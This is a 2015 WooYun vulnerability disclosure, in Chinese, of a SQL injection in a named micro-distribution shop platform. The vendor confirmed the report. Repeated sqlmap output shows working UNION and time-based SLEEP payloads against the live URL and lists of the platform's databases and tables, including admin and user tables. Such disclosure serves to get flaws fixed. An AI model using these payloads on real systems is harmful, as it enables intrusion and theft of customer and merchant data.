当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098000

漏洞标题:启博科技旗下微分销平台SQL注入漏洞

相关厂商:杭州启博科技

漏洞作者: creep

提交时间:2015-02-27 15:55

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

启博科技旗下微分销平台存在SQL注入漏洞,有上千家微店使用此平台,致使大量信息泄露。

详细说明:

直接上注入点,
http://m.wifenxiao.com/Item/detail/id/11849/sid/1005/pid/0.html
此平台为伪静态系统,注入存在于id参数。

sqlmap identified the following injection points with a total of 107 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: http://m.wifenxiao.com:80/Item/detail/id/-3294) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716d6d7671,0x6245564566716c587659,0x71676b6671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#/sid/446/pid/0.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://m.wifenxiao.com:80/Item/detail/id/5750) AND SLEEP(5) AND (1633=1633/sid/446/pid/0.html
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
available databases [6]:
[*] information_schema
[*] micro_fenxiao
[*] mysql
[*] performance_schema
[*] test
[*] www_wifenxiao_com
Database: micro_fenxiao
[94 tables]
+---------------------------+
| tp_1688                   |
| tp_account                |
| tp_acp_config             |
| tp_admin                  |
| tp_admin_group            |
| tp_agent                  |
| tp_agent_apply            |
| tp_agent_rank             |
| tp_ali1688_category       |
| tp_api_client             |
| tp_apply_withdraw_deposit |
| tp_area                   |
| tp_auto_reply             |
| tp_cart                   |
| tp_category               |
| tp_category_img           |
| tp_category_magazine      |
| tp_checkin_rule           |
| tp_city                   |
| tp_code                   |
| tp_collection             |
| tp_commission_log         |
| tp_commission_rank        |
| tp_complain_item          |
| tp_complain_order         |
| tp_config                 |
| tp_country                |
| tp_coupon                 |
| tp_custom_module          |
| tp_file                   |
| tp_follow                 |
| tp_freight_tpl            |
| tp_game                   |
| tp_game_prize             |
| tp_gift                   |
| tp_group                  |
| tp_item                   |
| tp_item_group             |
| tp_item_message           |
| tp_magazine               |
| tp_magazine_category      |
| tp_mass_send              |
| tp_mass_send_view         |
| tp_material_content       |
| tp_material_more          |
| tp_material_one           |
| tp_message                |
| tp_message_user           |
| tp_order                  |
| tp_order_del_log          |
| tp_order_import_log       |
| tp_order_item             |
| tp_order_show             |
| tp_page_design            |
| tp_point_log              |
| tp_property               |
| tp_property_value         |
| tp_province               |
| tp_province_freight       |
| tp_pub_weixin             |
| tp_pub_weixin_user        |
| tp_pv                     |
| tp_qfx_shop               |
| tp_rank_privilege         |
| tp_seller                 |
| tp_shipping_print_item    |
| tp_shipping_print_set     |
| tp_shop                   |
| tp_shop_balance           |
| tp_sku                    |
| tp_sms_recharge_pro       |
| tp_sms_recharge_record    |
| tp_sms_record             |
| tp_stores                 |
| tp_system_call            |
| tp_taobao_props           |
| tp_tb_cat                 |
| tp_tb_property            |
| tp_tb_property_value      |
| tp_tb_shop                |
| tp_template               |
| tp_user                   |
| tp_user_account           |
| tp_user_address           |
| tp_user_balance           |
| tp_user_checkin           |
| tp_user_checkin_rule      |
| tp_user_coupon            |
| tp_user_game              |
| tp_user_gift              |
| tp_user_group             |
| tp_user_rank              |
| tp_version                |
| tp_visit_log              |
+---------------------------+
Database: www_wifenxiao_com
[22 tables]
+---------------------+
| wi_address_area     |
| wi_address_city     |
| wi_address_province |
| wi_article_content  |
| wi_article_sort     |
| wi_column           |
| wi_column_banner    |
| wi_column_user      |
| wi_config           |
| wi_config_user      |
| wi_domain           |
| wi_down_content     |
| wi_down_sort        |
| wi_job_content      |
| wi_link_content     |
| wi_link_sort        |
| wi_logs             |
| wi_online           |
| wi_pic_content      |
| wi_pic_sort         |
| wi_users            |
| wi_users_group      |
+---------------------+


跑了部分表名出来。。。就不再继续了

漏洞证明:

直接上注入点,
http://m.wifenxiao.com/Item/detail/id/11849/sid/1005/pid/0.html
此平台为伪静态系统,注入存在于id参数。

sqlmap identified the following injection points with a total of 107 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: http://m.wifenxiao.com:80/Item/detail/id/-3294) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716d6d7671,0x6245564566716c587659,0x71676b6671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#/sid/446/pid/0.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://m.wifenxiao.com:80/Item/detail/id/5750) AND SLEEP(5) AND (1633=1633/sid/446/pid/0.html
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
available databases [6]:
[*] information_schema
[*] micro_fenxiao
[*] mysql
[*] performance_schema
[*] test
[*] www_wifenxiao_com
Database: micro_fenxiao
[94 tables]
+---------------------------+
| tp_1688                   |
| tp_account                |
| tp_acp_config             |
| tp_admin                  |
| tp_admin_group            |
| tp_agent                  |
| tp_agent_apply            |
| tp_agent_rank             |
| tp_ali1688_category       |
| tp_api_client             |
| tp_apply_withdraw_deposit |
| tp_area                   |
| tp_auto_reply             |
| tp_cart                   |
| tp_category               |
| tp_category_img           |
| tp_category_magazine      |
| tp_checkin_rule           |
| tp_city                   |
| tp_code                   |
| tp_collection             |
| tp_commission_log         |
| tp_commission_rank        |
| tp_complain_item          |
| tp_complain_order         |
| tp_config                 |
| tp_country                |
| tp_coupon                 |
| tp_custom_module          |
| tp_file                   |
| tp_follow                 |
| tp_freight_tpl            |
| tp_game                   |
| tp_game_prize             |
| tp_gift                   |
| tp_group                  |
| tp_item                   |
| tp_item_group             |
| tp_item_message           |
| tp_magazine               |
| tp_magazine_category      |
| tp_mass_send              |
| tp_mass_send_view         |
| tp_material_content       |
| tp_material_more          |
| tp_material_one           |
| tp_message                |
| tp_message_user           |
| tp_order                  |
| tp_order_del_log          |
| tp_order_import_log       |
| tp_order_item             |
| tp_order_show             |
| tp_page_design            |
| tp_point_log              |
| tp_property               |
| tp_property_value         |
| tp_province               |
| tp_province_freight       |
| tp_pub_weixin             |
| tp_pub_weixin_user        |
| tp_pv                     |
| tp_qfx_shop               |
| tp_rank_privilege         |
| tp_seller                 |
| tp_shipping_print_item    |
| tp_shipping_print_set     |
| tp_shop                   |
| tp_shop_balance           |
| tp_sku                    |
| tp_sms_recharge_pro       |
| tp_sms_recharge_record    |
| tp_sms_record             |
| tp_stores                 |
| tp_system_call            |
| tp_taobao_props           |
| tp_tb_cat                 |
| tp_tb_property            |
| tp_tb_property_value      |
| tp_tb_shop                |
| tp_template               |
| tp_user                   |
| tp_user_account           |
| tp_user_address           |
| tp_user_balance           |
| tp_user_checkin           |
| tp_user_checkin_rule      |
| tp_user_coupon            |
| tp_user_game              |
| tp_user_gift              |
| tp_user_group             |
| tp_user_rank              |
| tp_version                |
| tp_visit_log              |
+---------------------------+
Database: www_wifenxiao_com
[22 tables]
+---------------------+
| wi_address_area     |
| wi_address_city     |
| wi_address_province |
| wi_article_content  |
| wi_article_sort     |
| wi_column           |
| wi_column_banner    |
| wi_column_user      |
| wi_config           |
| wi_config_user      |
| wi_domain           |
| wi_down_content     |
| wi_down_sort        |
| wi_job_content      |
| wi_link_content     |
| wi_link_sort        |
| wi_logs             |
| wi_online           |
| wi_pic_content      |
| wi_pic_sort         |
| wi_users            |
| wi_users_group      |
+---------------------+


跑了部分表名出来。。。就不再继续了

修复方案:

新年快乐,来点小礼物可好?

版权声明:转载请注明来源 creep@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-02-28 09:17

厂商回复:

感谢您的帮助,我们会及时修复!

最新状态:

暂无